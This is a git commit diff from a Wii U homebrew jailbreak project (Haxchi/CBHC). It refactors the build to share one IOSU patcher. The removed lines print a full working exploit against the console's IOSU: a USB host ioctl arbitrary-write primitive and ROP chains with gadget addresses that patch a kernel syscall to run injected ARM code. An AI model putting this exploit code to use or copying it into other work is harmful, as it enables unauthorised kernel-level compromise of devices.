-use same iosu patcher for both haxchi and cbhc to allow haxchi to benefit from it

-added new config option to haxchi, "sysmenu" which will relaunch you into the system menu with signature, region patches and everything else that cbhc patches
-small logic correction in the iosu patcher
This commit is contained in:
FIX94 2016-12-19 04:14:47 +01:00
parent 3b005e9a39
commit 0ad99123db
66 changed files with 571 additions and 1334 deletions

View File

@ -1,2 +0,0 @@
This is a modified version of cfw booter which can be found here:
https://github.com/dimok789/cfw_booter

View File

@ -54,10 +54,10 @@ zeldaph: setup_zeldaph zeldaph.nds
zeldast: setup_zeldast zeldast.nds zeldast: setup_zeldast zeldast.nds
setup: setup:
@cd option_select && make && cd .. @cd cbhc_menu && make && cd ..
@cd hbl_loader && make && cd .. @cd hbl_loader && make && cd ..
@cd cfw_booter && make && cd .. @cd iosu_patcher && make && cd ..
@cd CBHC && make && cd .. @cd option_select && make && cd ..
setup_animalcrossing: setup_animalcrossing:
@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin @rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
@ -267,8 +267,8 @@ zeldast.zip:
clean: clean:
@rm -f *.bin *.nds ../installer/data/*.zip defines.s @rm -f *.bin *.nds ../installer/data/*.zip defines.s
@cd option_select && make clean && cd .. @cd cbhc_menu && make clean && cd ..
@cd hbl_loader && make clean && cd .. @cd hbl_loader && make clean && cd ..
@cd cfw_booter && make clean && cd .. @cd iosu_patcher && make clean && cd ..
@cd CBHC && make clean && cd .. @cd option_select && make clean && cd ..
@echo "all cleaned up !" @echo "all cleaned up !"

32
dsrom/cbhc_menu/Makefile Normal file
View File

@ -0,0 +1,32 @@
PATH := $(DEVKITPPC)/bin:$(PATH)
PREFIX ?= powerpc-eabi-
CC = $(PREFIX)gcc
AS = $(PREFIX)gcc
CFLAGS = -std=gnu89 -O3 -Wall -nostdinc -fno-builtin -I$(DEVKITPPC)/lib/gcc/powerpc-eabi/6.2.0/include -I$(DEVKITPPC)/powerpc-eabi/include
ASFLAGS = -mregnames -x assembler-with-cpp
LD = $(PREFIX)ld
OBJCOPY = $(PREFIX)objcopy
LDFLAGS=-Ttext 1808000 -L$(DEVKITPPC)/lib/gcc/powerpc-eabi/6.2.0 -L$(DEVKITPPC)/powerpc-eabi/lib -lgcc -lc
OBJDUMP ?= $(PREFIX)objdump
project := .
root := $(CURDIR)
build := $(root)/bin
FIRMWARE = 550
all: clean setup main
setup:
mkdir -p $(root)/bin/
main:
$(CC) $(CFLAGS) -DVER=$(FIRMWARE) -c $(project)/main.c
$(AS) $(ASFLAGS) -DVER=$(FIRMWARE) -c $(project)/crt0.S
cp -r $(root)/*.o $(build)
rm $(root)/*.o
$(LD) -o cbhc_menu.elf $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) -Map cbhc_menu.map
$(OBJCOPY) cbhc_menu.elf -S -O binary ../cbhc_menu.bin
clean:
rm -rf $(build) payload
rm -rf cbhc_menu.elf cbhc_menu.map

View File

@ -8,21 +8,8 @@
#include "types.h" #include "types.h"
#include "coreinit.h" #include "coreinit.h"
#include "pad.h" #include "pad.h"
#include "../global.h"
#define CHAIN_START 0x1016AD40
#define SHUTDOWN 0x1012EE4C
#define SIMPLE_RETURN 0x101014E4
#define SOURCE 0x01E20000
#define IOS_CREATETHREAD 0x1012EABC
#define ARM_CODE_BASE 0x08135000
#define REPLACE_SYSCALL 0x081298BC
/* YOUR ARM CODE HERE (starts at ARM_CODE_BASE) */
#include "payload/arm_kernel_bin.h"
#include "payload/arm_user_bin.h"
static void uhs_exploit_init(unsigned int coreinit_handle);
static int uhs_write32(unsigned int coreinit_handle, int dev_uhs_0_handle, int arm_addr, int val);
static unsigned int getButtonsDown(unsigned int padscore_handle, unsigned int vpad_handle); static unsigned int getButtonsDown(unsigned int padscore_handle, unsigned int vpad_handle);
#define BUS_SPEED 248625000 #define BUS_SPEED 248625000
@ -38,7 +25,7 @@ static unsigned int getButtonsDown(unsigned int padscore_handle, unsigned int vp
#define SD_HBL_PATH "/vol/external01/wiiu/apps/homebrew_launcher/homebrew_launcher.elf" #define SD_HBL_PATH "/vol/external01/wiiu/apps/homebrew_launcher/homebrew_launcher.elf"
#define SD_MOCHA_PATH "/vol/external01/wiiu/apps/mocha/mocha.elf" #define SD_MOCHA_PATH "/vol/external01/wiiu/apps/mocha/mocha.elf"
static const char *verChar = "CBHC v1.4 by FIX94"; static const char *verChar = "CBHC v1.4u1 by FIX94";
#define DEFAULT_DISABLED 0 #define DEFAULT_DISABLED 0
#define DEFAULT_SYSMENU 1 #define DEFAULT_SYSMENU 1
@ -63,11 +50,6 @@ static const char *bootOpts[DEFAULT_MAX] = {
"fw.img on SD Card", "fw.img on SD Card",
}; };
#define LAUNCH_SYSMENU 0
#define LAUNCH_HBL 1
#define LAUNCH_MOCHA 2
#define LAUNCH_CFW_IMG 3
#define OSScreenEnable(enable) OSScreenEnableEx(0, enable); OSScreenEnableEx(1, enable); #define OSScreenEnable(enable) OSScreenEnableEx(0, enable); OSScreenEnableEx(1, enable);
#define OSScreenClearBuffer(tmp) OSScreenClearBufferEx(0, tmp); OSScreenClearBufferEx(1, tmp); #define OSScreenClearBuffer(tmp) OSScreenClearBufferEx(0, tmp); OSScreenClearBufferEx(1, tmp);
#define OSScreenPutFont(x, y, buf) OSScreenPutFontEx(0, x, y, buf); OSScreenPutFontEx(1, x, y, buf); #define OSScreenPutFont(x, y, buf) OSScreenPutFontEx(0, x, y, buf); OSScreenPutFontEx(1, x, y, buf);
@ -413,11 +395,6 @@ doIOSUexploit:
OSScreenClearBuffer(0); OSScreenClearBuffer(0);
OSScreenFlipBuffers(); OSScreenFlipBuffers();
memcpy((void*)0xF5E70100, &sysmenu, 8);
*(volatile unsigned int*)0xF5E70108 = dsvcid;
*(volatile unsigned int*)0xF5E7010C = launchmode;
DCStoreRange((void*)0xF5E70100, 0x20);
int (*OSForceFullRelaunch)(void); int (*OSForceFullRelaunch)(void);
OSDynLoad_FindExport(coreinit_handle, 0, "OSForceFullRelaunch", &OSForceFullRelaunch); OSDynLoad_FindExport(coreinit_handle, 0, "OSForceFullRelaunch", &OSForceFullRelaunch);
@ -427,22 +404,16 @@ doIOSUexploit:
void(*_SYSLaunchMenuWithCheckingAccount)(unsigned char slot); void(*_SYSLaunchMenuWithCheckingAccount)(unsigned char slot);
OSDynLoad_FindExport(sysapp_handle,0,"_SYSLaunchMenuWithCheckingAccount",&_SYSLaunchMenuWithCheckingAccount); OSDynLoad_FindExport(sysapp_handle,0,"_SYSLaunchMenuWithCheckingAccount",&_SYSLaunchMenuWithCheckingAccount);
int (*IOS_Open)(char *path, unsigned int mode); //store path to sd fw.img for arm_kernel
int (*IOS_Close)(int fd); if(launchmode == LAUNCH_CFW_IMG)
OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Open", &IOS_Open); {
OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Close", &IOS_Close); strcpy((void*)0xF5E70000,"/vol/sdcard");
DCStoreRange((void*)0xF5E70000,0x100);
}
int dev_uhs_0_handle = IOS_Open("/dev/uhs/0", 0); //! Open /dev/uhs/0 IOS node //do iosu patches
uhs_exploit_init(coreinit_handle); //! Init variables for the exploit void (*patch_iosu)(unsigned int coreinit_handle, unsigned int sysapp_handle, int launchmode, int from_cbhc) = (void*)0x01804000;
patch_iosu(coreinit_handle, sysapp_handle, launchmode, 1);
//!------ROP CHAIN-------
uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0x14, CHAIN_START + 0x14 + 0x4 + 0x20);
uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0x10, 0x1011814C);
uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START + 0xC, SOURCE);
uhs_write32(coreinit_handle, dev_uhs_0_handle, CHAIN_START, 0x1012392b); // pop {R4-R6,PC}
IOS_Close(dev_uhs_0_handle);
if(launchmode == LAUNCH_HBL) if(launchmode == LAUNCH_HBL)
{ {
@ -454,6 +425,7 @@ doIOSUexploit:
strcpy((void*)0xF5E70000,SD_MOCHA_PATH); strcpy((void*)0xF5E70000,SD_MOCHA_PATH);
return 0x01800000; return 0x01800000;
} }
//sysmenu or cfw //sysmenu or cfw
if(launchmode == LAUNCH_CFW_IMG) if(launchmode == LAUNCH_CFW_IMG)
{ {
@ -599,329 +571,3 @@ static unsigned int getButtonsDown(unsigned int padscore_handle, unsigned int vp
return btnDown; return btnDown;
} }
/* ROP CHAIN STARTS HERE (0x1015BD78) */
static const int final_chain[] = {
0x101236f3, // 0x00 POP {R1-R7,PC}
0x0, // 0x04 arg
0x0812974C, // 0x08 stackptr CMP R3, #1; STREQ R1, [R12]; BX LR
0x68, // 0x0C stacksize
0x10101638, // 0x10
0x0, // 0x14
0x0, // 0x18
0x0, // 0x1C
0x1010388C, // 0x20 CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
0x0, // 0x24
0x0, // 0x28
0x1012CFEC, // 0x2C MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x30
0x0, // 0x34
IOS_CREATETHREAD, // 0x38
0x1, // 0x3C
0x2, // 0x40
0x10123a9f, // 0x44 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x00, // 0x48 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE92D4010, // 0x4C value: PUSH {R4,LR}
0x0, // 0x50
0x10123a8b, // 0x54 POP {R3,R4,PC}
0x1, // 0x58 R3 must be 1 for the arbitrary write
0x0, // 0x5C
0x1010CD18, // 0x60 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x64
0x0, // 0x68
0x1012EE64, // 0x6C set_panic_behavior (arbitrary write)
0x0, // 0x70
0x0, // 0x74
0x10123a9f, // 0x78 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x04, // 0x7C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE1A04000, // 0x80 value: MOV R4, R0
0x0, // 0x84
0x10123a8b, // 0x88 POP {R3,R4,PC}
0x1, // 0x8C R3 must be 1 for the arbitrary write
0x0, // 0x90
0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x98
0x0, // 0x9C
0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write)
0x0, // 0xA4
0x0, // 0xA8
0x10123a9f, // 0xAC POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x08, // 0xB0 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF
0x0, // 0xB8
0x10123a8b, // 0xBC POP {R3,R4,PC}
0x1, // 0xC0 R3 must be 1 for the arbitrary write
0x0, // 0xC4
0x1010CD18, // 0xC8 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0xCC
0x0, // 0xD0
0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write)
0x0, // 0xD8
0x0, // 0xDC
0x10123a9f, // 0xE0 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x0C, // 0xE4 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0)
0x0, // 0xEC
0x10123a8b, // 0xF0 POP {R3,R4,PC}
0x1, // 0xF4 R3 must be 1 for the arbitrary write
0x0, // 0xF8
0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x100
0x0, // 0x104
0x1012EE64, // 0x108 set_panic_behavior (arbitrary write)
0x0, // 0x10C
0x0, // 0x110
0x10123a9f, // 0x114 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x10, // 0x118 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE1A00004, // 0x11C value: MOV R0, R4
0x0, // 0x120
0x10123a8b, // 0x124 POP {R3,R4,PC}
0x1, // 0x128 R3 must be 1 for the arbitrary write
0x0, // 0x12C
0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x134
0x0, // 0x138
0x1012EE64, // 0x13C set_panic_behavior (arbitrary write)
0x0, // 0x140
0x0, // 0x144
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x14, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x18, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0x00000000, // 0x150 value: NOP
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x1C, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x20, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0x1AFFFFFD, // 0x150 value: BNE clean_loop
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x148 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x24, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4
0x0, // 0x154
0x10123a8b, // 0x158 POP {R3,R4,PC}
0x1, // 0x15C R3 must be 1 for the arbitrary write
0x0, // 0x160
0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x168
0x0, // 0x16C
0x1012EE64, // 0x170 set_panic_behavior (arbitrary write)
0x0, // 0x174
0x0, // 0x178
0x10123a9f, // 0x17C POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x28, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE1A03004, // 0x184 value: MOV R3, R4
0x0, // 0x188
0x10123a8b, // 0x18C POP {R3,R4,PC}
0x1, // 0x190 R3 must be 1 for the arbitrary write
0x0, // 0x194
0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x19C
0x0, // 0x1A0
0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write)
0x0, // 0x1A8
0x0, // 0x1AC
0x10123a9f, // 0x17C POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x2C, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE8BD4010, // 0x184 value: POP {R4,LR}
0x0, // 0x188
0x10123a8b, // 0x18C POP {R3,R4,PC}
0x1, // 0x190 R3 must be 1 for the arbitrary write
0x0, // 0x194
0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x19C
0x0, // 0x1A0
0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write)
0x0, // 0x1A8
0x0, // 0x1AC
0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC}
REPLACE_SYSCALL + 0x30, // 0x1B4 address: the beginning of syscall_0x1a (IOS_GetUpTime64)
0xE12FFF13, // 0x1B8 value: BX R3 our code :-)
0x0, // 0x1BC
0x10123a8b, // 0x1C0 POP {R3,R4,PC}
0x1, // 0x1C4 R3 must be 1 for the arbitrary write
0x0, // 0x1C8
0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x1D0
0x0, // 0x1D4
0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write)
0x0, // 0x1DC
0x0, // 0x1E0
0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC}
REPLACE_SYSCALL, // 0x1DC start of syscall IOS_GetUpTime64
0x4001, // 0x1E0 on > 0x4000 it flushes all data caches
0x0, // 0x1E0
0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len)
0x0, // 0x1DC
0x0, // 0x1E0
0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC}
ARM_CODE_BASE, // 0x1E8 our code destination address
0x0, // 0x1EC
0x0, // 0x1F0
0x101063db, // 0x1F4 POP {R1,R2,R5,PC}
0x0, // 0x1F8
sizeof(arm_kernel_bin), // 0x1FC our code size
0x0, // 0x200
0x10123983, // 0x204 POP {R1,R3,R4,R6,PC}
0x01E40000, // 0x208 our code source location
0x08131D04, // 0x20C KERNEL_MEMCPY address
0x0, // 0x210
0x0, // 0x214
0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot)
0x0,
0x0,
0x101312D0,
};
static const int second_chain[] = {
0x10123a9f, // 0x00 POP {R0,R1,R4,PC}
CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination
0x0, // 0x08
0x0, // 0x0C
0x101063db, // 0x10 POP {R1,R2,R5,PC}
0x01E30000, // 0x14 source
sizeof(final_chain), // 0x18 length
0x0, // 0x1C
0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC}
0x0, // 0x24
0x0, // 0x28
0x101236f3, // 0x2C POP {R1-R7,PC}
0x0, // 0x30 arg
0x101001DC, // 0x34 stackptr
0x68, // 0x38 stacksize
0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC}
0x0, // 0x40
0x0, // 0x44
0x0, // 0x48
0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
0x0, // 0x50
0x0, // 0x54
0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
0x0, // 0x5C
0x0, // 0x60
IOS_CREATETHREAD, // 0x64
0x1, // 0x68 priority
0x2, // 0x6C flags
0x0, // 0x70
0x0, // 0x74
0x101063db, // 0x78 POP {R1,R2,R5,PC}
0x0, // 0x7C
-(0x240 + 0x18 + 0xF000), // 0x80 stack offset
0x0, // 0x84
0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC}
0x0,
0x0,
0x0,
0x00110000 - 0x44, // 0x8C
0x00110010, // 0x90
0x0, // 0x94
0x0, // 0x98
0x0, // 0x9C
0x0, // 0xA0
0x0, // 0xA4
0x4, // 0xA8 R11 must equal 4 in order to pivot the stack
0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC}
0x0,
0x0,
0x1012EA68, // 0xAC stack pivot
};
static void uhs_exploit_init(unsigned int coreinit_handle)
{
void (*DCStoreRange)(const void *addr, uint32_t length);
OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange);
//! Clear out our used MEM1 area
memset((void*)0xF5E00000, 0, 0x00070000);
DCStoreRange((void*)0xF5E00000, 0x00070000);
//!------Variables used in exploit------
int *pretend_root_hub = (int*)0xF5E60640;
int *ayylmao = (int*)0xF5E00000;
//!-------------------------------------
ayylmao[5] = 1;
ayylmao[8] = 0x1E00000;
memcpy((char*)(0xF5E20000), second_chain, sizeof(second_chain));
memcpy((char*)(0xF5E30000), final_chain, sizeof(final_chain));
memcpy((char*)(0xF5E40000), arm_kernel_bin, sizeof(arm_kernel_bin));
memcpy((char*)(0xF5E50000), arm_user_bin, sizeof(arm_user_bin));
pretend_root_hub[33] = 0x1E00000;
pretend_root_hub[78] = 0;
//! Store current CPU cache into main memory for IOSU to read
DCStoreRange(ayylmao, 0x840);
DCStoreRange((void*)0xF5E20000, sizeof(second_chain));
DCStoreRange((void*)0xF5E30000, sizeof(final_chain));
DCStoreRange((void*)0xF5E40000, sizeof(arm_kernel_bin));
DCStoreRange((void*)0xF5E50000, sizeof(arm_user_bin));
DCStoreRange(pretend_root_hub, 0x160);
}
static int uhs_write32(unsigned int coreinit_handle, int dev_uhs_0_handle, int arm_addr, int val)
{
void (*DCStoreRange)(const void *addr, uint32_t length);
void (*OSSleepTicks)(uint64_t ticks);
int (*IOS_Ioctl)(int fd, uint32_t request, void *input_buffer,uint32_t input_buffer_len, void *output_buffer, uint32_t output_buffer_len);
OSDynLoad_FindExport(coreinit_handle, 0, "DCStoreRange", &DCStoreRange);
OSDynLoad_FindExport(coreinit_handle, 0, "OSSleepTicks", &OSSleepTicks);
OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Ioctl", &IOS_Ioctl);
//!------Variables used in exploit------
int *ayylmao = (int*)0xF5E00000;
//!-------------------------------------
ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes
DCStoreRange(ayylmao, 0x840); //! Store current CPU cache into main memory for IOSU to read
OSSleepTicks(0x200000); //! Wait for caches to refresh over in IOSU
//! index 0 is at 0x10149A6C, each index is 0x144 bytes long, so 0x10149A6C - (0x144*0xB349B) = 0x1E60640,
//! which is the physical address of 0xF5E60640 for us, right at the end of MEM1
int request_buffer[] = { -(0xB349B), val };
int output_buffer[32];
return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer));
}

View File

@ -1,44 +0,0 @@
PATH := $(DEVKITPPC)/bin:$(PATH)
PREFIX ?= powerpc-eabi-
CC = $(PREFIX)gcc
AS = $(PREFIX)gcc
CFLAGS = -std=gnu99 -O3 -nostdinc -fno-builtin
ASFLAGS = -mregnames -x assembler-with-cpp
LD = $(PREFIX)ld
OBJCOPY = $(PREFIX)objcopy
LDFLAGS=-Ttext 180C000 -L$(DEVKITPPC)/lib/gcc/powerpc-eabi/6.2.0 -lgcc
OBJDUMP ?= $(PREFIX)objdump
project := .
root := $(CURDIR)
build := $(root)/bin
FIRMWARE = 550
all: clean setup main
$(CURDIR)/payload/arm_kernel_bin.h: $(CURDIR)/payload/arm_user_bin.h
@$(MAKE) --no-print-directory -C $(CURDIR)/arm_kernel -f $(CURDIR)/arm_kernel/Makefile
@-mkdir -p $(CURDIR)/payload
@cp -p $(CURDIR)/arm_kernel/arm_kernel_bin.h $@
$(CURDIR)/payload/arm_user_bin.h:
@$(MAKE) --no-print-directory -C $(CURDIR)/arm_user -f $(CURDIR)/arm_user/Makefile
@-mkdir -p $(CURDIR)/payload
@cp -p $(CURDIR)/arm_user/arm_user_bin.h $@
setup:
mkdir -p $(root)/bin/
main: $(CURDIR)/payload/arm_kernel_bin.h
$(CC) $(CFLAGS) -DVER=$(FIRMWARE) -c $(project)/main.c
$(AS) $(ASFLAGS) -DVER=$(FIRMWARE) -c $(project)/crt0.S
cp -r $(root)/*.o $(build)
rm $(root)/*.o
$(LD) -o cfw_booter.elf $(build)/crt0.o `find $(build) -name "*.o" ! -name "crt0.o"` $(LDFLAGS) -Map cfw_booter.map
$(OBJCOPY) cfw_booter.elf -S -O binary ../cfw_booter.bin
clean:
rm -rf $(build) payload
rm -rf cfw_booter.elf cfw_booter.map
$(MAKE) --no-print-directory -C $(CURDIR)/arm_user -f $(CURDIR)/arm_user/Makefile clean
$(MAKE) --no-print-directory -C $(CURDIR)/arm_kernel -f $(CURDIR)/arm_kernel/Makefile clean

View File

@ -1,2 +0,0 @@
This is a modified version of cfw booter which can be found here:
https://github.com/dimok789/cfw_booter

View File

@ -1,71 +0,0 @@
ifeq ($(strip $(DEVKITARM)),)
$(error "Please set DEVKITARM in your environment. export DEVKITARM=<path to>devkitARM")
endif
ifeq ($(filter $(DEVKITARM)/bin,$(PATH)),)
export PATH:=$(DEVKITARM)/bin:$(PATH)
endif
CC = arm-none-eabi-gcc
# LINK = arm-none-eabi-gcc
LINK = arm-none-eabi-ld
AS = arm-none-eabi-as
OBJCOPY = arm-none-eabi-objcopy
CFLAGS += -Wall -mbig-endian -std=gnu99 -march=armv5 -Os -I$(DEVKITPRO)/libnds/include
LDFLAGS += --script=link.ld -EB -L"$(DEVKITARM)/arm-none-eabi/lib" -Map=output.map
CFILES = $(wildcard source/*.c)
BINFILES = $(wildcard data/*.bin)
OFILES = $(BINFILES:data/%.bin=build/%.bin.o)
OFILES += $(CFILES:source/%.c=build/%.o)
DFILES = $(CFILES:source/%.c=build/%.d)
SFILES = $(wildcard source/*.s)
OFILES += $(SFILES:source/%.s=build/%.o)
PROJECTNAME = ${shell basename "$(CURDIR)"}
CWD = "$(CURDIR)""
#---------------------------------------------------------------------------------
# canned command sequence for binary data, taken from devkitARM
#---------------------------------------------------------------------------------
define bin2o
bin2s $< | $(AS) -o $(@)
echo "extern const u8" `(echo $(<F) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`"_end[];" > source/`(echo $(<F) | tr . _)`.h
echo "extern const u8" `(echo $(<F) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`"[];" >> source/`(echo $(<F) | tr . _)`.h
echo "extern const u32" `(echo $(<F) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`_size";" >> source/`(echo $(<F) | tr . _)`.h
endef
.PHONY:=all dirs
all: dirs $(PROJECTNAME).bin $(PROJECTNAME)_bin.h
dirs:
@mkdir -p build
$(PROJECTNAME).bin: $(PROJECTNAME).elf
# $(OBJCOPY) -O binary $< $@
$(OBJCOPY) -j .text -j .rodata -O binary $< $@
$(PROJECTNAME)_bin.h: $(PROJECTNAME).bin
xxd -i $< | sed "s/unsigned/static const unsigned/g;s/$(PROJECTNAME)$*/$(PROJECTNAME)/g" > $@
$(PROJECTNAME).elf: $(OFILES)
$(LINK) $(LDFLAGS) -o $(PROJECTNAME).elf $(filter-out build/crt0.o, $(OFILES))
clean:
@rm -rf build
@rm -f $(PROJECTNAME).elf $(PROJECTNAME).bin $(PROJECTNAME)_bin.h output.map
@echo "all cleaned up !"
-include $(DFILES)
build/%.o: source/%.c
$(CC) $(CFLAGS) -c $< -o $@
@$(CC) -MM $< > build/$*.d
build/%.o: source/%.s
$(CC) $(CFLAGS) -xassembler-with-cpp -c $< -o $@
@$(CC) -MM $< > build/$*.d
build/%.bin.o: data/%.bin
@echo $(notdir $<)
@$(bin2o)

View File

@ -1,18 +0,0 @@
OUTPUT_ARCH(arm)
MEMORY
{
RAMX (rx) : ORIGIN = 0x08134100, LENGTH = 0x000BF00
}
SECTIONS
{
.text : ALIGN(0x100) {
build/crt0.o(.init)
*(.text)
}
.rodata : {
*(.rodata*)
}
}

View File

@ -1,12 +0,0 @@
.section ".init"
.arm
.align 4
.extern _main
.type _main, %function
.extern memset
.type memset, %function
_start:
b _main

View File

@ -1,122 +0,0 @@
#include "types.h"
#include "utils.h"
#include "../../payload/arm_user_bin.h"
static const char repairData_set_fault_behavior[] = {
0xE1,0x2F,0xFF,0x1E,0xE9,0x2D,0x40,0x30,0xE5,0x93,0x20,0x00,0xE1,0xA0,0x40,0x00,
0xE5,0x92,0x30,0x54,0xE1,0xA0,0x50,0x01,0xE3,0x53,0x00,0x01,0x0A,0x00,0x00,0x02,
0xE1,0x53,0x00,0x00,0xE3,0xE0,0x00,0x00,0x18,0xBD,0x80,0x30,0xE3,0x54,0x00,0x0D,
};
static const char repairData_set_panic_behavior[] = {
0x08,0x16,0x6C,0x00,0x00,0x00,0x18,0x0C,0x08,0x14,0x40,0x00,0x00,0x00,0x9D,0x70,
0x08,0x16,0x84,0x0C,0x00,0x00,0xB4,0x0C,0x00,0x00,0x01,0x01,0x08,0x14,0x40,0x00,
0x08,0x15,0x00,0x00,0x08,0x17,0x21,0x80,0x08,0x17,0x38,0x00,0x08,0x14,0x30,0xD4,
0x08,0x14,0x12,0x50,0x08,0x14,0x12,0x94,0xE3,0xA0,0x35,0x36,0xE5,0x93,0x21,0x94,
0xE3,0xC2,0x2E,0x21,0xE5,0x83,0x21,0x94,0xE5,0x93,0x11,0x94,0xE1,0x2F,0xFF,0x1E,
0xE5,0x9F,0x30,0x1C,0xE5,0x9F,0xC0,0x1C,0xE5,0x93,0x20,0x00,0xE1,0xA0,0x10,0x00,
